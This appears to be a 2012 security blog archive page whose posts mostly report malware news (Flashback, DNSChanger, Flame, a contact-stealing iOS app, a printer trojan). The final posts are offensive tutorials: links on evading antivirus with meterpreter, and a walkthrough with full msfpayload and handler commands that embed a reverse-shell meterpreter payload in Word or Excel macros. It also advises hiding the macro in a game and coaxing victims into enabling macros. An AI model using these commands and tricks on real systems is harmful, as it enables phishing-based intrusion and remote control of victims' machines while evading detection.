Showing posts with label malware. Show all posts
Showing posts with label malware. Show all posts

Monday, July 30, 2012

Apple finally releases Java patches for Flashback malware


apple, oracle, java, trojan, malware, os x, exploits, os x 10.6, os x 10.7, flashba
Apple silently released security patches for Java, addressing 12 separate flaws yesterday after their OS X operating system was found to be vulnerable to the Flashback Trojan. In fact security experts were so worried about the potential for damage from the malware that they recommended ditching Java until it had been plugged.
While those using Microsoft’s Windows OS were at the highest level of risk initially, the Mac Security blog Intego found a new Flashback variant in the wild at the beginning of March, created to specifically target Apple OS X users.
The new update is available from the update manager for OS X 10.6 and 10.7 operating systems and is described by Apple as targeting “multiple vulnerabilities [that] exist in Java 1.6.0_29, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Visiting a web page containing a maliciously crafted untrusted Java applet may lead to arbitrary code execution with the privileges of the current user. “
Further investigations by Sucuri Security located a considerable number of infected websites using older releases of WordPress with the "ToolsPack" plugin installed. Analysis of this plugin revealed it was simply a backdoor that allowed hackers to execute any code on the infected website. It is believed these sites are re-directing the browsers of Mac OS X users to webpages containing the new strain of Flashback malware. 
Whilst it is good that Apple has finally patched the vulnerabilities that Windows users saw updates for back in February, it is rumored that one critical flaw remains, which F-Secure says is being actively discussed on underground forums where money is also being exchanged in return for the exploit code. 
"It is strongly recommended to update your Java client to the latest version, disable it when not needed, or better yet, remove it completely if you don’t really need it," the security firm said in a blog post yesterday.
Attacks are rarely as serious in nature on Apple’s OS X platform, but there is no doubt that exploits are increasing as hackers realize the value of targeting their OS. More alarmingly, the Flashback malware has also opened up another potential problem – Apple by all accounts has been very slow to respond to the security fixes that Oracle released for their affected software used on Windows back In February.

Friday, July 20, 2012

Panda Cloud Antivirus 2.0 brings faster, smarter detection


Panda Security has released an overhauled version of its cloud-based antivirus software today, bringing a slew of new features including an updated interface and Windows 8 compatibility. Available in both free and paid versions, Panda Cloud Antivirus 2.0 touts 50% faster on-demand scans, improved disinfection rates and reduced memory usage.
Previously limited to the paid version, free users now benefit from Panda's behavioral analysis engine. The free software also packs a new cloud-based disinfection engine, improved offline protection, the ability to display individual processes for everything connected to the Internet, URL and Web filtering, as well as new advanced configuration options.
The Pro Edition costs $30 a year and contains all of the above in addition to a new community-based firewall that manages permissions with real-time knowledge from Panda's global userbase, protection on public Wi-Fi networks, and automatic "USB vaccination." Pro customers also get an ad-free experience and 24/7 multilingual support.
Although Panda isn't particularly popular compared to solutions by Microsoft, ESET, AVG, Avira and Avast, the company's software ranks well among many independent antivirus testing outfits. Panda Cloud Antivirus 1.5.2, for instance, earned AV-Test's certification award a few months back with high ratings for protection, repair and usability.

If you're already using an older version of Panda Cloud Antivirus, it should update automatically in the coming days or you can manually download the latest build here. Be sure to uninstall antiviruses by other companies before you try Panda. Also, watch for an installation option that installs a toolbar and changes your default search provider.

Tuesday, July 10, 2012

Mac Malware at the Moment

It's been a while since we last wrote about Mac malware, so I thought it would be good to give our readers an update on what's been happening during the last few months. Last year we detailed a possible Mac trojan in the making. At that time we were still speculating whether it would be part of a bundle or just a standalone binary. Now it's clear: a new variant was discovered and it is a full-blown application, complete with an icon.

The author calls this variant version 1.0 ("FILEAGENTVer1.0" in little-endian) as seen from the binary's code:

FILEAGENTVer1.0

The sample I analyzed uses thumbnail images/icons of Irina Shayk, apparently taken from the March 2012 issue of FHM (South Africa) magazine. The malicious application bundle is being spread inside an archive file together with other images taken from the magazine hoping that its file type will be overlooked by users.

FHM Feb Cover Girl Irina Shayk H-Res Pics

Nothing else is new besides the implementation. The backdoor payload is still the same but uses a new C&C server. The server is currently active (at time of publication). It is important to take note that the new C&C server still points to the same IP address as the previous variant as mentioned by the folks at ESET. We have reported the server to CERT-FI. Hopefully they will be able notify the proper authorities.

We detect this new variant as Trojan-Dropper:OSX/Revir.C, MD5: 7DBA3A178662E7FF904D12F260F0FFF3.

Moving along — there's another more serious OS X malware threat lurking out there. The Flashback trojan, which first appeared around the same time as Revir, is still in the wild. It is using exploits to infect systems without user interaction. Though what it's exploiting are old Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353), we might begin seeing a real OS X outbreak if the gang upgrades their operation a notch higher and start targeting unpatched vulnerabilities.

In a future post, I will detail how to locate a Flashback infection. In the meantime, the easiest way to avoid infection is to just disable Java from your browser(s). Based on our surveys, most users don't really need Java when browsing the Web. If for some reasons you do need Java, say for online banking, turn it on only when you need it. And then turn it off again after you're done.

In Safari, you can disable Java by unchecking "Enable Java" in Safari Preferences, Security tab.

Safari, Java settings

Or you can disable Java from the Snow Leopard (Lion doesn't come with Java by default) by going to Applications, Utilities, Java Preferences. Uncheck everything in the General tab.

Java Preferences

Regards,
Brod

Sunday, July 8, 2012

Hundreds of thousands may lose web access July 9 due to virus



fbi, internet, malware, spyware, dns, dnschanger, viruses, warnings, isc, dcwg, hundre
July 9 is the day thousands of PCs (and Macs) infected with DNSChanger will lose their ability to surf the web. Although the virus was introduced in 2007, according to the DCWG's data, as many as 500,000 computers may still be infected. This is a friendly reminder to make certain your computers are malware-free and that their DNS settings are nominal.

In 2011, the FBI busted the unscrupulous band of individuals responsible for DNSChanger, shutting down their Eastern European servers -- a move which actually knocked millions of infected users off the web. Although those servers run by the criminals were used to feed infected users profitable ads, phishing attempts and malware, they also provided victims with a working DNS service -- servers which allow human-friendly hostnames to point to Internet locations that computers understand (IP address numbers). 

Victims were left with computers configured to use DNS servers which no longer existed. As a result, nearly 4 million people were left without Internet access.

As a courtesy, FBI technorati organized an effort to temporarily provide DNS service for DNSChanger victims. After a period of time though, the FBI handed off this responsibility to the Internet Systems Consortium, a non-profit organization who has managed to keep the DNS flowing to infected users. However, this act of kindness will end on Monday.


How do I find out if I'm infected with DNSChanger?
Google and Facebook have been warning infected users. You can also manually check using this tool.

What should I do if I'm infected?

Visit DCWG for instructions and a list of utilities capable of removing DNSChanger from your computer. If none of these tools seem to work, your router's settings may have been changed by the virus (it does do that, believe it or not). You'll need to enter your router's web configuration (instructions vary) and change its DNS settings.

Virus scanners have been able to detect and prevent DNSChanger infections for some time now. Protect yourself!

First malware ever found in iOS App Store malicious app removed



apple, android, ios, app store, mobile, russian, russia, malware, hacking, security, apps, google play, virus
For the first time, according to Kaspersky Labs, security researchers have unearthed what appears to be malware on the Apple App Store. "Find and Call", a Russian-language app which touted contact list simplification, was discovered to be a little toointerested in its users' contact lists. Security experts discovered that Find and Call would upload the victim's entire address book and GPS coordinates to a remote server, and then proceed to spam all of their contacts.

Apple quickly pulled the app, citing guidelines which prohibit app makers from uploading contacts to remote servers. However, this is not the first time an app from the App Store has quietly stolen address books from unsuspecting iPhone and iPad users.

Path, a popular social photo-taking app, was busted last year by an observant developer who noticed the app was sending more data to third-party servers than it should have. It was discovered that Path was actually storing contact lists on remote servers in order to suggest friends its users.

While Path responded appropriately and their intentions seemed mostly benevolent, users had no idea this was occurring. Following the discovery, Path modified their app to warn users of the behavior. Apple also responded by updating its developer guidelines; however, Apple has since been criticized for not uniformly enforcing some of those rules.

Love it or hate it, Apple's walled garden has seemingly had a positive effect on minimizing malware -- at least, so far. On the other hand, the Android Market (now known as Google Play) has been portrayed as something very different. Reports of malware on Google Play have been frequent and plenty, but Google has taken steps this year to clean up their app store.
Source

Tuesday, June 26, 2012

Malware affecting thousands of office printers worldwide


malware, symantec, office printers, trojan.milicenso, adware.eore
A piece of malware known as Trojan.Milicenso thatoriginally surfaced in 2010 has been making a comeback over the past two weeks, primarily affecting office printers in the US, India, Europe and South America, according to Symantec. The resulting infection causes a massive amount of print jobs containing garbage characters to be sent to print servers, resulting in wasted ink and paper, not to mention causing headaches for uninformed office works and IT staff.

Symantec says that their initial inspection in 2010 revealed that Trojan.Milicenso was essentially a “malware delivery vehicle for hire” but the latest version is associated with Adware.Eorezo which is an adware that targets French speaking users.

The current iteration infects systems using traditional means including malicious email attachments or visiting a website that contains malicious scripts. Unsuspecting users are typically guided to dangerous websites by clicking links in an unsolicited email, Symantec says. Furthermore, they have also found that a large number of samples are being packaged as a fake codec.

The malicious code continues to send print jobs to the printer until it either runs out of paper or ink. Interestingly enough, the security company notes that this appears to be a side effect of the infection instead of the author’s intended goal of generating bogus ad clicks from serving up advertisements.

Symantec suggests that all users follow best security practices and keep anti-virus programs updated with the latest definitions.
Source : http://techspot.com

Sunday, June 24, 2012

Flame virus created by U.S. and Israel sources say, Iran is target


nsa, government, iran, malware, united states, hacking, security, virus, duqu, stuxnet, us, israel, encryption, cyberattack, flame, md5, cyberwar, cyberwarfare, national security, flam
The Washington Post reports that Flame, an extremely sophisticated virus which was first discovered in Iranian oil refineries, is the brainchild of U.S. and Israeli efforts to slow Iran's nuclear program. This information comes from several Western officials who purportedly have knowledge of the project, but wish to remain anonymous.

Despite the report's veiled sources, Flame's U.S. origins aren't necessarily a surprise. Earlier this month, the New York Times shed light uponOperation: Olympic Games, a U.S. project which utilized other sophisticated viruses known as Duquand Stuxnet. These virus targeted Iranian SCADA systems, allowing their creators to access, gather intelligence and even control certain aspects of Iran's nuclear and oil refining facilities. 

Security researchers recently discovered Stuxnet code within Flame -- an unofficial confirmation that the creators of Stuxnet (i.e. U.S. government) were also behind the virus. After this discovery was made, the virus began to self-destruct, hastily removing itself from infected computers as though it were taking cues from a spy novel.

Flame wowed security researchers with its incredible sophistication. The 20MB virus carried a payload which could be transmitted through spoofing Windows Updates, allowing it to infect even non-compromised computers on the same network. The creators used what is believed to be an unknown MD5 collision attack to forge Microsoft's digital signature on a fraudulent certificate, an achievement which was described by security researchers as the holy grail of malware writers.

Flame also has modules which could utilize microphones and web cameras, log keystrokes, collect screen shots and allow it to propagate via removable media (i.e. USB thumb drives), allowing it to be introduced into sensitive networks isolated from the public. It would even use Bluetooth to send commands to other computers, providing a bevy of vectors for infecting, monitoring and controlling nearby workstations.

Friday, June 22, 2012

Evading Antivirus Emulator using stealth meterpreter


A nice tutorial from Y0nd13, based on known techniques to evade antivirus:
1. Use metasploit’s msfencode to ‘pack’ the backdoor:
http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
Download the presentation here

VBScript Infection Methods


Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well. It doesn’t necessarily need to be a Metasploit payload. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through.
First things first, lets create our VBScript and set up a Metasploit listener.
Code:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 280
Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai
root@bt4:/pentest/exploits/framework3# mv payload.exe tools/
root@bt4:/pentest/exploits/framework3# cd tools/
root@bt4:/pentest/exploits/framework3/tools# ruby exe2vba.rb payload.exe payload.vbs
[*] Converted 14510 bytes of EXE into a VBA script
root@bt4:/pentest/exploits/framework3/tools# cd..
root@bt4:/pentest/exploits/framework3# ./msfcli | grep multi/handler
[*] Please wait while we load the module tree...
exploit/multi/handler Generic Payload Handler
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
To recap everything we have performed up until now, we have created our payload using the shikata_ga_nai polymorphic encoder, turned it into an executable, had it connect back to us on port 8080 at host 10.211.55.162. We then convert our executable to VBScript using the “exe2vba.rb” script in the tools section. Once this is complete, you will need to get on a Windows machine that has Word on it and perform the following steps:
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you’re using Word/Excel 2007, go to View Macros, then place a name like “moo” and select “create”.
This will open up the visual basic editor. Paste the output of the payload.vbs file into the editor, save it and type some junk into the actual word doc itself. This is when you would perform the client-side attack by emailing this Word document to someone.
In order to keep user suspicion low, try embedding the code in one of the many Word/Excel games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.
Here we give a generic name to the macro.
First, test out the document by opening it up, check back to where we have our Metasploit exploit/multi/handler listener:
Code:
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai LPORT=8080 LHOST=10.211.55.162 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (10.211.55.162:8080 -> 10.211.55.134:1696)
 
meterpreter> execute -f cmd.exe -i
Process 2152 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\rel1k>
Success! We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn’t get picked up by anti-virus!!!
Note there are multiple methods to do this, you could also use the:
Code:
root@bt4:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai Y > payload.exe
This will output the payload to a vbs script so follow the same steps as mentioned above. Something to mention is that macros are pretty much disabled by default in both home and corporate environments, so you would either have to entice them to enable macros or hope that they enable them to view the entire document properly. This is where having the script embedded in a document containing an embedded Flash game comes in handy.